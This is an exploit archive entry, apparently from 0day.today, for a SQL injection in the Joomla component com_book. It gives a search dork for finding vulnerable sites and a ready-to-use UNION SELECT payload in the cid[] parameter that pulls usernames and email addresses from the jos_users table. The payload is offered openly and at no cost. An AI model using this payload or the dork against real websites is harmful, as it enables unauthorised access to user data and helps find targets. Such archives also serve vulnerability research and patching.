Joomla Component com_book SQL injection Vulnerability

2010-01-21T00:00:00
ID 1337DAY-ID-10704
Type zdt
Reporter Evil-Cod3r
Modified 2010-01-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Joomla Component com_book SQL injection Vulnerability
=====================================================

 [»] Script:             [ Joomla Comp ]
    [»] Language:           [ PHP ]
    [»] Dork:               [ inurl:"com_book" ]
    [»] Founder:            [ Evil-Cod3r ]
 [»] Price:              [ Free ]
###########################################################################
 
http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit
 
 Exploit : -
 
index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users--
 
 
Author: Evil-Cod3r



#  0day.today [2018-03-28]  #